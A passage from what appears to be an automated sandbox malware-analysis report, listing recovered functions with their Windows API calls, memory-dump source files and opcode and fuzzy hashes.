                                                                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00A556C2,?,?,00000000,00000000,?,?,?,?,?,?,00A166CE), ref: 00A83A56
                                                                                                                                                                                                                                                                                                    • LockResource.KERNEL32(00A556C2,?,?,00A556C2,?,?,00000000,00000000,?,?,?,?,?,?,00A166CE,?), ref: 00A83A65
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                    • Opcode ID: d0734624471a6e11359ed929b55f16a729366412b26ab7f1646c4e569b8cedc3
                                                                                                                                                                                                                                                                                                    • Instruction ID: bd381907deb21359a8ce80658cc74ff3e3a49b329bf963b00a8225dc1d90ebf5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0734624471a6e11359ed929b55f16a729366412b26ab7f1646c4e569b8cedc3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9117C71200702BFDB259B65DC48F67BBB9EBC5B80F14426CB442966A0DBB2D901C620
                                                                                                                                                                                                                                                                                                    Function 00A720AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A71916
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A71922
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A71931
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A71938
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7194E
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00A71C81), ref: 00A720FB
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A72107
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00A7210E
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A72127
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00A71C81), ref: 00A7213B
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A72142
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 73f079b073a6628728edbe9963efe9833d6dae5d11662c04aae1d364836cd13d
                                                                                                                                                                                                                                                                                                    • Instruction ID: c9d0c07e16dc5206b1529e47336a1e32ab1428d0307478a8be34ca48bc60a6c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73f079b073a6628728edbe9963efe9833d6dae5d11662c04aae1d364836cd13d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA11BE71600206FFDB20DFA4DC09BAE7BB9FF45355F54C218E98A97160C7359942CB60
                                                                                                                                                                                                                                                                                                    Function 00A8A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A8A5BD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A8A6D0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A842B9: GetInputState.USER32 ref: 00A84310
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A843AB
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A8A5ED
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A8A6BA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 736c3515cdda075a4af53517e5da4a6235880b8ac9fde0908ac3222178512f85
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2f9697832ae8bde057b8149621a65164cdbd592d2baa07c64c2adab8e9dc9f96
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 736c3515cdda075a4af53517e5da4a6235880b8ac9fde0908ac3222178512f85
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441717190420AAFDF14EFA4CD49AEEBBB4FF15310F144066E805A31A1EB309E85CF61
                                                                                                                                                                                                                                                                                                    Function 00A122AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?), ref: 00A1233E
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00A12421
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00A12434
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: eb36a527b1e91ecf0684014912acc8d1de9e32304f85c199a6dc01d87f276591
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3d06d82c0aefaba0a1bf7f5430326f8e799f2c60df6082ad7ea2a7809054577c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb36a527b1e91ecf0684014912acc8d1de9e32304f85c199a6dc01d87f276591
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A8146B1504404BEEA2DA7384D98FFF256EEB87341F100109F512CA5D6DA69CFA68376
                                                                                                                                                                                                                                                                                                    Function 00A92263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A93AD7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: _wcslen.LIBCMT ref: 00A93AF8
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A922BA
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A922E1
                                                                                                                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00A92338
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A92343
                                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00A92372
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: dd38fb7164257f02422b74ca0cddc66d927468646902ea3e716b9363262d3ed1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 19ab5618e64b0028f27b5bf7eb72fd34908ac21ea1692fadfc4900668b37061b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd38fb7164257f02422b74ca0cddc66d927468646902ea3e716b9363262d3ed1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1051C575B00210AFDB10EF24C986F6A77E5AB49754F488058F9565F3C3CB74AD428BE1
                                                                                                                                                                                                                                                                                                    Function 00AA26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c2c73bc3f559e41e927cb872b477491d09de397e16a6ede11b11bf80f3747feb
                                                                                                                                                                                                                                                                                                    • Instruction ID: c2bae8b4aa47c61ab9293272fd2a6da695b1d10e91da2590ff83da9554b4a23d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c73bc3f559e41e927cb872b477491d09de397e16a6ede11b11bf80f3747feb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B21F4317002118FD7109F2EC844B5A7BE5EF86314F58806DE88A8B2D1DB71EE52CB90
                                                                                                                                                                                                                                                                                                    Function 00A8D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00A8D8CE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00A8D92F
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00A8D943
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9685c3dfb8b9d16dd20ccf82842f5e05dee137c526281bc6417db013191378ec
                                                                                                                                                                                                                                                                                                    • Instruction ID: c07c6fba00082dadbb232e4d5e08d648194509548fd262259ed39799789270b8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9685c3dfb8b9d16dd20ccf82842f5e05dee137c526281bc6417db013191378ec
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0921A171900705EFE720EFA5D984BAAB7FCEB41314F10441EE58692591E770EE05CB90
                                                                                                                                                                                                                                                                                                    Function 00A7E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00A546AC), ref: 00A7E482
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00A7E491
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A7E4A2
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7E4AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 61a972c0b2741cc222bed50d3d695367247e0a1edfad6715fca4b07e679b6931
                                                                                                                                                                                                                                                                                                    • Instruction ID: ee4445f9c910bbf88f2b87ec953f374bc7e606bcb9b771e49ed00f4707d166c5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61a972c0b2741cc222bed50d3d695367247e0a1edfad6715fca4b07e679b6931
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F0E53141091157D211E7BCAC0D8EB776DAE07335B50C781F8BBC24F0E7799D9A8695
                                                                                                                                                                                                                                                                                                    Function 00A6E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                                                                                                                                    • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                    • Opcode ID: 466e49ffd7b2f0567c26425be89e3973c9d02cf4f3afb1ef024d5c684b9012d1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6eb26acd545a9dd02e8a5c3e7441360825c6f494acd333f91be46ee1c1159361
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 466e49ffd7b2f0567c26425be89e3973c9d02cf4f3afb1ef024d5c684b9012d1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72D062BDC05119EACB91D694DD49DF9737CBB19700F648866F946D1040F72499489B22
                                                                                                                                                                                                                                                                                                    Function 00A42992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A42A8A
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A42A94
                                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A42AA1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0559581e0314cdd4abbf44bba1ab19813974a06cdbae60895745d89bfb06b620
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9c017fc3b78c32499ffd294d00e6f37c1a09c5908784284002d9c6ecc0d960a1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0559581e0314cdd4abbf44bba1ab19813974a06cdbae60895745d89bfb06b620
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB31B5759012289BCB21DF68DD89BDDBBB8AF48350F5041EAF80CA6261E7709F85CF45
                                                                                                                                                                                                                                                                                                    Function 00A72010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A309D8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A309F5
                                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A7205A
                                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A72087
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A72097
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 40269e758e3f239cf42468f6b266b8fd0ee9905605192596b5acd74a22eb6927
                                                                                                                                                                                                                                                                                                    • Instruction ID: 538cbf7b098706c1257c16089b61a8bf65a023dcc9912bb68cf68051ffeb75b9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40269e758e3f239cf42468f6b266b8fd0ee9905605192596b5acd74a22eb6927
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38118FB1414205AFD7189F64DC86E6BB7B8EB45710F20C51EF05A57691DB70BC42CB64
                                                                                                                                                                                                                                                                                                    Function 00A35058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00A3502E,?,00AD98D8,0000000C,00A35185,?,00000002,00000000), ref: 00A35079
